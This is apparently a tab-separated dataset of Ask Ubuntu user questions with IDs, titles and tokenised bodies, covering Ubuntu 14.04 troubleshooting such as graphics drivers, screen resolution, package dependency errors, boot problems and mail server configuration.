455860	video card radeon hd 7770 bad performance using power point running presentation	my problem started after i installed ubunutu 14.04 , when i was with ubuntu 13.10 i configured my video card with fglrx working perfectly . but know when i install any of the both alternative of fglrx ( or updates ) when i run microsoft office 2010 , presentations and try to run the presentation the program freeze in a black screen , i can quit the program but that never happen before . if i install the native driver , it works . the point is that i can notice that my video card is not performing well . this is my card -- - @ -- -- -desktop : ~ $ lspci | grep vga 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] cape verde xt [ radeon hd 7770/8760 / r7 250x ] i try it install the driver that i saw in amd web page , but that finally end in to a new re installation of the system . i saw a new driver for linux amd catalystâ˘ 14.4 linux release but it says is for ubuntu 13.04 , so i guess i ca n't use it . somebody have any idea how i can make my video card performing as it is suppose again .
455861	va_getdrivername ( ) failed with unknown	i upgraded to 14.04 and afterwards i got an issue with cpu usage when playing hd . i checked the vainfo and this what i got back ibva info : va-api version 0.35.0 libva info : va_getdrivername ( ) returns -1 libva error : va_getdrivername ( ) failed with unknown libva error , driver_name= ( null ) vainitialize failed with error code -1 ( unknown libva error ) , exit i re install the driver sudo apt-get -- reinstall install i965-va-driver but i steel got the same error . any thoghts
455865	kexec does'n work	i 've got some problem with kexec -e command : i use kexec -l to load a kernel , or pxe-kexec . then i type kexec -eand the result is a complete freeze of the system ( no keyword works but ctrl+alt+canc that do a hardware reboot ) if i do kexec -e out of the gui ( sudo service lightdm stop ) the last thing that i can see is : [ 000.000000 ] starting new kernel _ then it freeze . is there someone that could help me ?
455866	need to share a volume on home pc	i have a xp dual hard drive system - c : and d : with 2 users -my spouse and i. i have a window 7 single drive system with 2 logical partitions c : and d : same 2 users . both are ntfs . d : drive contains all data that needs to be always available to whomever is active , regardless of whether or not the other is logged in . i have successfully done a wubi 14.04 lts install on windows 7 machine , and i 've edited and fixed grub from ro to rw to allow correct boot into ubuntu . i 'm holding off on the xp until issue resolved i can not figure out how to have the d : drive always available . when i switch users , the d ; is unavailable unless i authorize an ultsnmount of the other user . i tried to change the share on the d : drive , but `` the share name is too long '' . unacceptable for 70+ year old non tech !
455868	user account does n't display anything except background and cursor	i did something in compizconfig manager and the launcher and other bars was gone ! i tried using the set background from right click menu and checked if it was a driver problem , but it was not . i also tried keyboard shortcuts for terminal etc . but none worked . i switched my pc off and logged in with standard user which does n't have a password and it worked completely . so i went back to the account with problem ( admin ) and made it a standard user and the other user an admin but i forgot to set a password for the other account . now i ca n't do anything in the other account because it requires admin password and my not working admin 's user password does n't work , and the other user which i made admin does n't have a password so i ca n't do anything like access hard drive to save my user files to windows partition , delete account , delete compiz etc .
455870	nodejs hangs on ubuntu 14.04 boot [ big cpu & memory usage ]	node somehow hangs on ubuntu 14.04 boot . it uses lots of cpu and ram ( checked with terminal - > top ) . i need to have root permissions to kill it and it does n't work after the first time . had to spam killall and top - > k so it vanished after some time . i guess it should n't even be supposed that node somehow starts up with ubuntu booting without any configuration . anyone having similar issues ? installed it from this ppa : https : //launchpad.net/~chris-lea/+archive/node.js/ edit : if i send kill signals to node all the time it seems like a new instance of node appears . i guess there are either many instances of node running at the same time or it restarts when killed . as i wrote before , it vanishes after a while spamming sudo killall node but do n't know if the killing has an effect or it leaves by itself after some time . edit # 2 : sudo killall -9 node seems to kill it . looks like it ignores sigterm so sigkill needs to be used ( -9 ) . that 's still a temporary solution though . any ideas why it autostarts when booting ubuntu and where to disable that ? i 've already configured the startup applications program to show hidden processes , but it 's not listed there .
455871	printer pixma mp250 no longer prints after upgrade to 14.04	when looking at localhost:631 , i 'm seeing : stopped `` the ppd version ( 5.2.9 ) is not compatible with gutenprint 5.2.10-pre2 . '' the original drivers are quite old ( 2010 ) , and i needed to install libtiff4 by hand to install the .deb packages . does anyone know how to get it to work ? are there any alternative drivers ?
455873	xubuntu 14.04 : screen resolution 1440x900 , no xorg.conf or lightdm.conf	so i 'm quite confused now by the fact that i read a lot of different solutions for a screen resolution problem , but none of them apply to my case ( i think ) . so i 'm running a xubuntu 14.04 x64 and can not get my lg flatron w1934s suitable with the system . cvt output : linuxdev @ linux-dev-pc : ~ $ cvt 1440 900 # 1440x900 59.89 hz ( cvt 1.30ma ) hsync : 55.93 khz ; pclk : 106.50 mhz modeline `` 1440x900_60.00 '' 106.50 1440 1528 1672 1904 900 903 909 934 -hsync +vsync as for now the screen work perfectly by using the following lines $ : xrandr -- newmode `` 1440x900_60.00 '' 106.50 1440 1528 1672 1904 900 903 909 934 -hsync +vsync $ : xrandr -- addmode vga1 1440x900_60.00 $ : xrandr -- output vga1 -- mode 1440x900_60.00 and underneath the current situation : linuxdev @ linux-dev-pc : ~ $ xrandr -q screen 0 : minimum 320 x 200 , current 1440 x 900 , maximum 32767 x 32767 vga1 connected 1440x900+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1440x900 59.9 1024x768 60.0 800x600 60.3 56.2 848x480 60.0 640x480 59.9 1440x900_60.00 59.9* virtual1 disconnected ( normal left inverted right x axis y axis ) lshw display output : *-display description : vga compatible controller product : 82945g/gz integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 02 width : 32 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:16 memory : fe980000-fe9fffff ioport : dc00 ( size=8 ) memory : d0000000-dfffffff memory : fe940000-fe97ffff now is the big question ; how do i create a permanent record for it ? what i tried till now is to look into the 'xorg.conf ' , that does not exist anymore after upgrading . when i manually create the 'xorg.conf ' the system craps out and will not boot anymore into the gui . through the terminal , i need to remove the 'xorg.conf ' to get it booted again into the normal state with the low resolution . also the 'lightdm.conf ' is quite a hassle to find or adjust so my options run very low at the moment . ( the only lightdm.conf that i found is located at /etc/init , but with the output from the file i do n't have a clue where or what to edit ) /etc/init/lightdm.conf output : linuxdev @ linux-dev-pc : ~ $ cat /etc/init/lightdm.conf # lightdm - light display manager # # the display manager service manages the x servers running on the # system , providing login and auto-login services # # based on gdm upstart script description `` lightdm display manager '' author `` robert ancell < robert.ancell @ canonical.com > '' start on ( ( filesystem and runlevel [ ! 06 ] and started dbus and plymouth-ready ) or runlevel prevlevel=s ) stop on runlevel [ 016 ] emits login-session-start emits desktop-session-start emits desktop-shutdown script if [ -n `` $ upstart_events '' ] then # check kernel command-line for inhibitors , unless we are being called # manually for arg in $ ( cat /proc/cmdline ) ; do if [ `` $ arg '' = `` text '' ] ; then plymouth quit || : stop exit 0 fi done [ ! -f /etc/x11/default-display-manager -o `` $ ( cat /etc/x11/default-display-manager 2 > /dev/null ) '' = `` /usr/bin/lightdm '' -o `` $ ( cat /etc/x11/default-display-manager 2 > /dev/null ) '' = `` /usr/sbin/lightdm '' ] || { stop ; exit 0 ; } if [ `` $ runlevel '' = s -o `` $ runlevel '' = 1 ] then # single-user mode plymouth quit || : exit 0 fi fi exec lightdm end script post-start script sleep 5 clear > /dev/tty7 end script post-stop script clear > /dev/tty7 sleep 1 if [ `` $ upstart_stop_events '' = runlevel ] ; then initctl emit desktop-shutdown fi end script thanks for the read and eventual reply !
455875	error processing package initramfs-tools no space left on device	i have a persistent copy of ubuntu ( made with pendrivelinux ) on a 4gb pendrive . i 'm trying to install eng language support ( after accidentally deleting it ) but i get an error that says : error processing package initramfs-tools no space left on device . i already did sudo apt-get remove sudo apt-get clean sudo apt-get autoremove and after that df -h is : filesystem size used avail use % mounted on /cow 2.7g 1.9g 742m 72 % / udev 3.0g 4.0k 3.0g 1 % /dev tmpfs 599m 1.2m 598m 1 % /run /dev/sdc1 3.8g 3.8g 2.0k 100 % /cdrom /dev/loop0 936m 936m 0 100 % /rofs none 4.0k 0 4.0k 0 % /sys/fs/cgroup tmpfs 3.0g 2.4m 3.0g 1 % /tmp none 5.0m 0 5.0m 0 % /run/lock none 3.0g 336k 3.0g 1 % /run/shm none 100m 72k 100m 1 % /run/user /dev/sdb1 1.9t 1.2t 652g 66 % /media/ubuntu/usb-hdd /dev/loop1 2.7g 1.9g 742m 72 % /media/ubuntu/casper-rw /dev/sda3 459g 370g 89g 81 % /media/ubuntu/packard bell /dev/sda4 459g 121g 339g 27 % /media/ubuntu/data is there anything i could do ? it 's my first time using ubuntu , btw . eta : ubuntu @ ubuntu : ~ $ sudo fdisk -l disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x1a72457f device boot start end blocks id system /dev/sda1 2048 29362175 14680064 27 hidden ntfs winre /dev/sda2 * 29362176 29566975 102400 7 hpfs/ntfs/exfat /dev/sda3 29566976 991008767 480720896 7 hpfs/ntfs/exfat /dev/sda4 991008768 1953521663 481256448 7 hpfs/ntfs/exfat disk /dev/sdb : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xa48d32de device boot start end blocks id system /dev/sdb1 63 3907024064 1953512001 7 hpfs/ntfs/exfat disk /dev/sdc : 4009 mb , 4009754624 bytes 126 heads , 22 sectors/track , 2825 cylinders , total 7831552 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xe4ad4591 device boot start end blocks id system /dev/sdc1 * 2048 7831551 3914752 c w95 fat32 ( lba )
455876	how to connect wiimote and launch xbmc at the same time	i would like to be able to launch xbmc when i connect my wiimote using xbmc-wiiremote . for the moment , i have to launch a little script that start xbmc and xbmc-wiiremote and then push 1+2 of the wiimote but i would prefer to just push 1+2 of the wiimote when i want to start xbmc and the wiimote since i have no mouse and keyboard on this computer , just a xbox 360 pad i use as mouse and for games ( steam , etc. ) . i have spent a lot of time to find a solution but in vain . the idea would be to have a script at startup . thank you for your help .
455880	how to print a screen using a keyboard shortcut ?	since windows 95 i have used alfred bollinger 's printkey program to print what is on the screen . i have just started ubuntu and can not find a keyboard shortcut that will let me print what is on the screen . although sometimes it is nice to save a copy of the screen , i want to just print what is on my screen whether it is using firefox , or just the desktop . please is there some way to map the key to print ? do you all know of a program that would work with ubuntu and do this ? reply : ( i still have n't figured out yet how to get the comments up so will do it here ) thank you all . i will try the various suggestions until i find one that fits me . i believed there had to be a way to redefine the keys , but do n't have enough knowledge yet of ubuntu . i 'll post which one works best for me when i decide . thanks again .
455883	installing 14.04 ( mac-version ) to macbook pro ( 9,1 )	i have tried different methods to do this , but almost always same point fails . normally when i boot into usb ( or dvd , via usb ) the install starts , but nothing happens for an hour . this is the most i 've waited so far , wheel just keeps spinning ... this happens after the selection of language and upgrades / propietary software . i have followed different guides from ubuntu sites , and also done the usb with different tools . only thing i can think now is this : i have replaced my dvd with second sdd . can this be the cause of this problem ? normally when i boot to install with usb , i have to unplug externeal usb3-hub so that only have the usb stick directly on my mbp . if i have external usb3-hub connected i get reboot or freeze . i can connect the hub after the livecd has booted and i 'm on the desktop . i can also install wireless and nvidia drivers when i 'm in the livecd , or use my iphone as wireless network when i 'm just trying to install directly . partition that have include osx and bootcamp ( win 8.1 ) . i have tried also to install to `` empty '' space in bootcamp or second sdd and so that i would resize the win 8.1 size . .. . and i use refit on my mbp . any help ?
455886	value of if command outcomes	i 'm pretty new to ubuntu linux , let 's say all of linux because i installed it a few days ago . i 'm sorry for my mistakes in my use of english , because i live in the netherlands . well i tried to do some programming , writing a script , but i encountered a problem which i have n't been able to solve yet . well i was writing a script , and i want this script to automatically install a few things for me . well i was doing and tried to make as less nests as i could , and i finished my script , but i thought . why would n't i try to put a few lines in it which check if the programs are correctly installed . so i wondered how i could do it and i came up with the following : because i 'm new to programming i wanted it to be so advanced as i could by myself . so i decided to try to work with shell functions . these functions check if the correct file is there , and the outcome of these functions has to be a value which i can use later . here an example : function isitthere { if [ -f < thefile > ] ; then true else false fi } if [ $ ( isitthere ) = `` true '' ] ; then echo `` your program is properly installed '' else echo `` your program is n't properly installed . fi in this example are true and false my values , and as you see , i try to re-use them in my second command . i know this can be done much more easily , but i want to know if it is possible , and if it is possible how . because in one part of my script doing it like this makes it much easier . is there any way you can give a value to your if command and use that value later in your next if command ? thanks .
455888	low resolution on lubuntu 14.04 ( sis )	the resolution of my lubuntu is 640x480 and i can not change it . there 's no more options in the screen definitions . this is my ( horrible ) graphic card : isabel @ esprimo-mobile-v5515 : ~ $ lspci 00:00.0 host bridge : silicon integrated systems [ sis ] 671mx 00:01.0 pci bridge : silicon integrated systems [ sis ] agp port ( virtual pci-to-pci bridge ) 00:02.0 isa bridge : silicon integrated systems [ sis ] sis968 [ mutiol media io ] ( rev 01 ) 00:02.5 ide interface : silicon integrated systems [ sis ] 5513 ide controller ( rev 01 ) 00:03.0 usb controller : silicon integrated systems [ sis ] usb 1.1 controller ( rev 0f ) 00:03.1 usb controller : silicon integrated systems [ sis ] usb 1.1 controller ( rev 0f ) 00:03.3 usb controller : silicon integrated systems [ sis ] usb 2.0 controller 00:04.0 ethernet controller : silicon integrated systems [ sis ] 191 gigabit ethernet adapter ( rev 02 ) 00:05.0 ide interface : silicon integrated systems [ sis ] sata controller / ide mode ( rev 03 ) 00:06.0 pci bridge : silicon integrated systems [ sis ] pci-to-pci bridge 00:07.0 pci bridge : silicon integrated systems [ sis ] pci-to-pci bridge 00:0f.0 audio device : silicon integrated systems [ sis ] azalia audio controller 00:1f.0 pci bridge : silicon integrated systems [ sis ] pci-to-pci bridge 01:00.0 vga compatible controller : silicon integrated systems [ sis ] 771/671 pcie vga display adapter ( rev 10 ) 02:00.0 ethernet controller : qualcomm atheros ar242x / ar542x wireless network adapter ( pci-express ) ( rev 01 ) and this is what i got when i run the `` xrandr '' command . isabel @ esprimo-mobile-v5515 : ~ $ xrandr xrandr : failed to get size of gamma for output default screen 0 : minimum 640 x 480 , current 640 x 480 , maximum 640 x 480 default connected primary 640x480+0+0 0mm x 0mm 640x480 73.0* 800x600_60.00 ( 0x198 ) 38.2mhz h : width 800 start 832 end 912 total 1024 skew 0 clock 37.4khz v : height 600 start 603 end 607 total 624 clock 59.9hz 2048x1536_60.00 ( 0x1da ) 267.2mhz h : width 2048 start 2208 end 2424 total 2800 skew 0 clock 95.4khz v : height 1536 start 1539 end 1543 total 1592 clock 60.0hz 1024x728_60.00 ( 0x1dc ) 63.5mhz h : width 1024 start 1072 end 1176 total 1328 skew 0 clock 47.8khz v : height 768 start 771 end 775 total 798 clock 59.9hz 1024x768_60.00 ( 0x1dd ) 63.5mhz h : width 1024 start 1072 end 1176 total 1328 skew 0 clock 47.8khz v : height 768 start 771 end 775 total 798 clock 59.9hz so , i want to have a 1024x768 resolution in this computer and i ca n't do nothing in this moment . i 'm a newbie in linux and for that reason i need some help . i tried to follow some steps that i saw in some topics but nothing happens . hope you can help me : ) cheers .
455889	can not install ubuntu on uefi device from scratch	i 've replaced my hdd by a sdd on my zenbook prime and am trying to install only ubuntu 14.04 . before , i installed ubuntu on the hdd which was already containing windows 7 , and everything worked great . i 've made a gtp partition table on my ssd and created 3 partitions , a boot efi one , / and /home . when i boot , i can see grub but then after grub is complaining that it can not find the disk by uuid . boot-repair does n't work . i 've tried installing letting ubuntu do the partitionning , same problem . i 've tried disabling secure boot ( which is named `` anti-theft in my bios ... ) and installed in legacy mode , same problem too . /dev/sdb is my live ubuntu on an usb key . here is boot-repair log : http : //paste.ubuntu.com/7338302/ idea why my disk is not found ? thanks ! edit : i 've changed the gpt table to a mbr ( msdos in parted ) one and created 2 partitions : / and /home . the problem is still the same , it can not find the disk by uuid . i 've launched boot-repair , and this time , it worked , but the problem is still here . here is the new pastebin : http : //paste.ubuntu.com/7340850/
455890	does postgresql ( server ) setup a main cluster after installation ? ( 14.04 )	i 'm surprised that installing postgresql on ubuntu does n't give me a working postgres server setup immediately : it requires additional steps : setting up postgresql-common ( 154 ) ... * no postgresql clusters exist ; see `` man pg_createcluster '' setting up postgresql-9.3 ( 9.3.4-1 ) ... update-alternatives : using /usr/share/postgresql/9.3/man/man1/postmaster.1.gz to provide /usr/share/man/man1/postmaster.1.gz ( postmaster.1.gz ) in auto mode * no postgresql clusters exist ; see `` man pg_createcluster '' setting up postgresql ( 9.3+154 ) ... i 've seen similar behaviour in the past , where the installer failed to create a default cluster ( i thing ) because some locale setting was missing but i think i have these setup correctly . is it new ( and therefore correct ) that an additional step is required on ubuntu 14.04 ? or is something ( silently ) broken ? all of this is happening on a fresh digitalocean 14.04 vps .
455891	ubuntu 14.04 dual boot with windows 8	i use a asus n550jv laptop with preloaded windows 8 . i have turned off fast boot and secure boot , and enabled csm boot . before installation , i used windows disk management to shrink 15gb out of a harddrive ( it 's an 128gb ssd . i still have windows so i do n't have too much space for ubuntu . but i think 15gb is enough right ? ) during installation , the an error appeared , saying `` unable to install grub in /dev/sda . executing 'grub-install/dev/sda ' failed . this is a fatal error . ) then it asked me to choose a location for boot loader . could anyone tell me how shall i deal with this problem ? thanks a lot !
455893	dependency error ( 1 )	dpkg : error processing package liblzma5 : i386 ( -- configure ) : package is in a very bad inconsistent state ; you should reinstall it before attempting configuration dpkg : dependency problems prevent configuration of libxml2 : i386 : libxml2 : i386 depends on liblzma5 ( > = 5.1.1alpha+20120614 ) ; however : package liblzma5 : i386 is not configured yet . dpkg : error processing package libxml2 : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libtiff5 : i386 : libtiff5 : i386 depends on liblzma5 ( > = 5.1.1alpha+20120614 ) ; however : package liblzma5 : i386 is not configured yet . dpkg : error processing package libtiff5 : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgd3 : i386 : libgd3 : i386 depends on libtiff5 ( > > 4.0.0-1~ ) ; however : package libtiff5 : i386 is not configured yet . dpkg : error processing package libgd3 : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgphoto2-6 : i386 : libgphoto2-6 : i386 depends on libgd3 ( > = 2.1.0~alpha~ ) ; however : no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because maxreports is reached already package libgd3 : i386 is not configured yet . libgphoto2-6 : i386 depends on libxml2 ( > = 2.7.4 ) ; however : package libxml2 : i386 is not configured yet . dpkg : error processing package libgphoto2-6 : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgstreamer0.10-0 : i386 : libgstreamer0.10-0 : i386 depends on libxml2 ( > = 2.7.4 ) ; however : package libxml2 : i386 is not configured yet . dpkg : error processing package libgstreamer0.10-0 : i386 ( -- configure ) : dependency problems - leaving unconfiguredno apport report written because maxreports is reached already no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libgstreamer-plugins-base0.10-0 : i386 : libgstreamer-plugins-base0.10-0 : i386 depends on libgstreamer0.10-0 ( > = 0.10.36 ) ; however : package libgstreamer0.10-0 : i386 is not configured yet . dpkg : error processing package libgstreamer-plugins-base0.10-0 : i386 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libsane : i386 : libsane : i386 depends on libgphoto2-6 ( > = 2.5.2 ) ; however : package libgphoto2-6 : i386 is not configured yet . libsane : i386 depends on libtiff5 ( > = 4.0.3 ) ; however : package libtiff5 : i386 is not configured yet . dpkg : error processing package libsane : i386 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libxslt1.1 : i386 : libxslt1.1 : i386 depends on libxml2 ( > = 2.9.0 ) ; however : package libxml2 : i386 is not configured yet . dpkg : error processing package libxslt1.1 : i386 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of wine1.6-i386 : wine1.6-i386 depends on libgphoto2-6 ( > = 2.5.2 ) ; however : package libgphoto2-6 : i386 is not configured yet . wine1.6-i386 depends on libgstreamer-plugins-base0.10-0 ( > = 0.10.22 ) ; however : package libgstreamer-plugins-base0.10-0 : i386 is not configured yet . wine1.6-i386 depends on libgstreamer0.10-0 ( > = 0.10.26 ) ; however : package libgstreamer0.10-0 : i386 is not configured yet . wine1.6-i386 depends on libxml2 ( > = 2.9.0 ) ; however : package libxml2 : i386 is not configured yet . dpkg : error processing package wine1.6-i386 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of wine1.6 : wine1.6 depends on wine1.6-i386 ( = 1:1.6.2-0ubuntu4 ) ; however : package wine1.6-i386 is not configured yet . dpkg : error processing package wine1.6 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of wine : no apport report written because maxreports is reached already wine depends on wine1.6 | wine1.7 ; however : package wine1.6 is not configured yet . package wine1.7 is not installed . dpkg : error processing package wine ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of playonlinux : playonlinux depends on wine | wine-unstable ; however : package wine is not configured yet . package wine1.6 which provides wine is not configured yet . package wine-unstable is not installed . dpkg : error processing package playonlinux ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of wine1.6-amd64 : wine1.6-amd64 depends on wine1.6 : any ( = 1:1.6.2-0ubuntu4 ) ; however : package wine1.6 is not configured yet . dpkg : error processing package wine1.6-amd64 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : liblzma5 : i386 libxml2 : i386 libtiff5 : i386 libgd3 : i386 libgphoto2-6 : i386 libgstreamer0.10-0 : i386 libgstreamer-plugins-base0.10-0 : i386 libsane : i386 libxslt1.1 : i386 wine1.6-i386 wine1.6 wine playonlinux wine1.6-amd64 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) this is what my terminal shows whenever i am trying to donwload or use apt-get command ... searhced alot on ask ubuntu forums but nothing worked for me , help ! ! ! !
455900	how to reduce the saturation of of laptop monitor in ubuntu 14.04 ?	i want to reduce the saturation of my laptop display as its very high and hurts my eyes . i own a dell xps 15z . also , i would be very grateful if anybody can help me to show how all the color management of laptop display can be done . thanks in advance .
455902	massive error ! x-nautilus-desktop : ///	im getting this error once i start up by netbook running ubuntu 12.04 about `` x-nautilus-desktop : /// '' . there 's no desktop , lags horribly and the bar at the top of the screen 's blank anyways to fix it without reimaging it ? here more on what it said ... error : dbus error org.freedesktop.dbus.error.serviceunknown : the name org.gtk.vfs.daemon was not provided by any .service files please select another viewer and try again . i listened to elder geek and now can access the terminal , now what ?
455915	how can i use two-finger swipe to switch windows ?	i 'd basically like the alt+tab combination to be performed whenever i swipe with two fingers left or right . i saw similar functionality in a mac os x and i think it might be useful = ) touchegg wiki , however , does n't seem to explain how one 's supposed to set it up as to switch between windows with swiping , so ... i do n't know how to do it .
455919	add monitor settings in lightdm	where do i have to place missing monitor preferences in lightdm , to load them at startup ?
455923	smtp mail server with postfix/dovecot does not require authentication	i have a mail server with postfix and dovecot with which i 'm able to receive mail at my email address . when i 'm connecting from a remote mail client via pop3 it is saying authentication failed even though i am giving the right password . but still the mail client is able to send mail from my account without proper authentication . how would i configure it so that authentication is required to send email ? the output for postconf -n writes - alias_database = hash : /etc/aliases alias_maps = hash : /etc/aliases append_dot_mydomain = no biff = no broken_sasl_auth_clients = yes config_directory = /etc/postfix home_mailbox = maildir/ inet_interfaces = all inet_protocols = all mailbox_command = mailbox_size_limit = 0 mydestination = example.com , mail.example.com , localhost.example.com , localhost myhostname = mail.example.com mynetworks = 127.0.0.0/8 myorigin = /etc/mailname readme_directory = no recipient_delimiter = + relayhost = smtp_tls_note_starttls_offer = yes smtp_tls_security_level = may smtp_tls_session_cache_database = btree : $ { data_directory } /smtp_scache smtpd_banner = $ myhostname esmtp $ mail_name ( ubuntu ) smtpd_recipient_restrictions = permit_sasl_authenticated , permit_mynetworks , reject_unauth_destination smtpd_sasl_auth_enable = yes smtpd_sasl_local_domain = smtpd_sasl_security_options = noanonymous smtpd_sasl_type = cyrus smtpd_sender_restrictions = reject_unknown_sender_domain , reject_unknown_recipient_domain , reject_unauth_pipelining smtpd_tls_cafile = /etc/ssl/certs/cacert.pem smtpd_tls_auth_only = no smtpd_tls_cert_file = /etc/ssl/certs/smtpd.crt smtpd_tls_key_file = /etc/ssl/private/smtpd.key smtpd_tls_loglevel = 1 smtpd_tls_mandatory_ciphers = medium smtpd_tls_mandatory_protocols = sslv3 , tlsv1 smtpd_tls_received_header = yes smtpd_tls_session_cache_database = btree : $ { data_directory } /smtpd_scache smtpd_tls_session_cache_timeout = 3600s tls_random_source = dev : /dev/urandom thanks
455924	what is the difference between gnome compiz flashback and gnome metacity flashback ?	i upgrade ubuntu 13.10 from development branch ( alpha version or beta version ) and after that at login user only two options are available.here i attach image of gnome metacity gnome compiz flashback gnome metacity flashback what are these versions of gnome and i would like any information what the differences are ? for how to get back ubuntu default i asked here another question and here is link for that same question
455926	unlock screen in 14.04 without `gnome-screensaver-command`	i 've been happily using blueproximity in 13.10 , but since upgrade to 14.04 it only locks when my phone goes out of range ( using gnome-screensaver-command -l ) , but it does not unlock with gnome-screensaver-command -d. now the reason that gnome-screensaver-command -d does n't work is because of a bug . however on that bug report it is mentioned that the gnome-screensaver is no longer used in trusty and therefore the gnome-screensaver-command is expected to be phased out , which could also be related to why the command does n't work . so my question is , if the gnome-screensaver is replaced , then what would be the new command to unlock the screen without relying on gnome-screensaver-command ?
455928	how do i backup system to a different partition on the same drive ?	i am a linux newbie , tech oldie . i am setting up a system with lubuntu 14.04 . although , when i ran the installation i created two partitions -- 1/2 for quickie backups and 1/2 for the installed system -- lubuntu ignored that and took my entire disk . yesterday , i spent a lot of time with the redo rescue disk manually recreating what i wanted . now , i have the following paritions : /dev/sda1 ext2 /boot +- 200mb /dev/sda2 extended +- 244gb /dev/sda3 ext2 +- 220gb sda1 and sda2 were created by the installer . i manually created sda3 after resizing those . within sda2 is a logical volume sda5 lvm2 pv lubuntu-vg within sda 5 there are a swap partion and the root partition and nothing else . these were also created by the installer , but i resized them yesterday . i want to backup sda1 and sda2 to sda3 . i have been at this long enough to know that gives me zero protection from a disk failure . i just want to quickly be able to restore my work up to a certain point if i screw something up as i am tweaking the new system . i have the qt4-fsarchiver livecd , the systemrescuecd livecd and the redo rescue livecd . as a linux newbie , i have been unable to figure out how to do this on any of these .
455930	eclipse fail to start in a clean workspace	i 'm having a problem starting any version of eclipse in any kind of workspace ( brand new or with data already ) . the problem started when i upgraded my os from ubuntu 13.10 to 14.04 , and tried to relaunch the eclipse ( springsource tool suite actually ) that i 've being using all the time . i 've tried cleaning the .metadata from the workspace , a clean workspace , the last sts available to download in the flavours of eclipse 3,8 and 4.2 and different jvms . the results are always the same ... when i start eclipse , after its shown the splash screen followed by workspace dialogue and the interface , it would freeze and close without any error message . this is the console log that i get : â sts-3.5.0.release ./sts -clean -refresh -debug -consolelog -clearpersistedstate start vm : /usr/lib/jvm/jdk1.7.0_45/bin/java -dosgi.requiredjavaversion=1.6 -xms40m -xmx768m -xx : maxpermsize=256m -jar /home/esteban/springsource/sts-3.5.0.release//plugins/org.eclipse.equinox.launcher_1.3.0.v20120522-1813.jar -os linux -ws gtk -arch x86_64 -showsplash -launcher /home/esteban/springsource/sts-3.5.0.release/sts -name sts -- launcher.library /home/esteban/springsource/sts-3.5.0.release//plugins/org.eclipse.equinox.launcher.gtk.linux.x86_64_1.1.200.v20120913-144807/eclipse_1502.so -startup /home/esteban/springsource/sts-3.5.0.release//plugins/org.eclipse.equinox.launcher_1.3.0.v20120522-1813.jar -- launcher.overridevmargs -exitdata 44b8014 -product org.springsource.sts.ide -clean -refresh -debug -consolelog -clearpersistedstate -vm /usr/lib/jvm/jdk1.7.0_45/bin/java -vmargs -dosgi.requiredjavaversion=1.6 -xms40m -xmx768m -xx : maxpermsize=256m -jar /home/esteban/springsource/sts-3.5.0.release//plugins/org.eclipse.equinox.launcher_1.3.0.v20120522-1813.jar install location : file : /home/esteban/springsource/sts-3.5.0.release/ configuration file : file : /home/esteban/springsource/sts-3.5.0.release/configuration/config.ini loaded configuration location : file : /home/esteban/springsource/sts-3.5.0.release/configuration/ framework located : file : /home/esteban/springsource/sts-3.5.0.release/plugins/org.eclipse.osgi_3.8.2.v20130124-134944.jar loading extension : reference : file : org.eclipse.equinox.weaving.hook_1.0.200.i20130319-1000.jar eclipse.properties not found loading extension : reference : file : org.eclipse.fx.osgi_0.9.0.201401250701.jar eclipse.properties not found framework classpath : file : /home/esteban/springsource/sts-3.5.0.release/plugins/org.eclipse.osgi_3.8.2.v20130124-134944.jar file : /home/esteban/springsource/sts-3.5.0.release/plugins/ file : /home/esteban/springsource/sts-3.5.0.release/plugins/org.eclipse.equinox.weaving.hook_1.0.200.i20130319-1000.jar file : /home/esteban/springsource/sts-3.5.0.release/plugins/org.eclipse.fx.osgi_0.9.0.201401250701.jar splash location : /home/esteban/springsource/sts-3.5.0.release/configuration/org.eclipse.equinox.launcher/org.springsource.sts_3.5.0.201404011851-release/splash.bmp gtk-message : failed to load module `` overlay-scrollbar '' debug options : file : /home/esteban/springsource/sts-3.5.0.release/.options not found time to load bundles : 54 org.eclipse.m2e.logback.configuration : the org.eclipse.m2e.logback.configuration bundle was activated before the state location was initialized . will retry after the state location is initialized . starting application : 9910 org.eclipse.m2e.logback.configuration : logback config file : /home/esteban/documents/workspace-sts-3.5.0.release/.metadata/.plugins/org.eclipse.m2e.logback.configuration/logback.1.4.1.20140328-1905.xml org.eclipse.m2e.logback.configuration : initializing logback 